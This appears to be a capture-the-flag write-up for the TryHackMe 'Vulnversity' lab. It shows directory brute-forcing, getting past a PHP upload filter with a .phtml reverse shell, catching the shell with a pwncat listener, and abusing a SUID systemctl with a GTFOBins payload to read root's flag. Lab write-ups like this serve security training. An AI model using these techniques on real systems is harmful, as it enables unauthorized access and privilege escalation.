✅TryHackMe - Vulnversity (Easy)
Summary
Gobuster finds a hidden directory /internal
which has an upload form. The upload form filters .php
extension, but Burp Intruder finds that phtml
bypasses the filter. Here we rename php-reverse-shell.php
to php-reverse-shell.phtml
and get a www-data shell.
On the victim machine, /bin/systemctl
is SUID. Using an arbitrary file read payload on GTFOBins, we are able to read root.txt
without getting a root shell.
IP
RHOST: 10.10.64.243
LHOST: 10.13.12.2
Nmap

Asset Discovery
Run Gobuster against port 3333:
gobuster dir -u http://10.10.64.243:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
Gobuster finds /internal
:

www-data shell: File Upload with PHP Extension Bypass
There is an upload form in /internal
:

Try uploading php-reverse-shell.php
here. However, this file is not present in the /internal/uploads
directory:

Perhaps the .php
file extension is blocked. Brute-force valid file extensions using Burpsuite Intruder. Remember turn off "URL-encode these characters":

Make a PHP extension wordlist:
.php
.php3
.php4
.php5
.phtml
Intruder finds that the only valid extension is .phtml
:

Rename the PHP reverse shell payload to php-reverse-shell.phtml
and upload again. This time the file is successfully uploaded:

Start a pwncat listener:
pwncat-cs :443
Trigger the reverse shell payload and get a user shell as www-data
:

Arbitrary File Read: SUID /bin/systemctl
/bin/systemctl
Search for SUID file:
find / -perm -u=s -type f 2>/dev/null
Note that /bin/systemctl
is SUID:

GTFOBins has a privesc payload for systemctl
. Change the payload to cat /root/root.txt > /tmp/output
:
$ TF=$(mktemp).service
$ echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
$ /bin/systemctl link $TF
$ /bin/systemctl enable --now $TF
Execute these commands line by line on the victim machine and read the content of root.txt
:

Last updated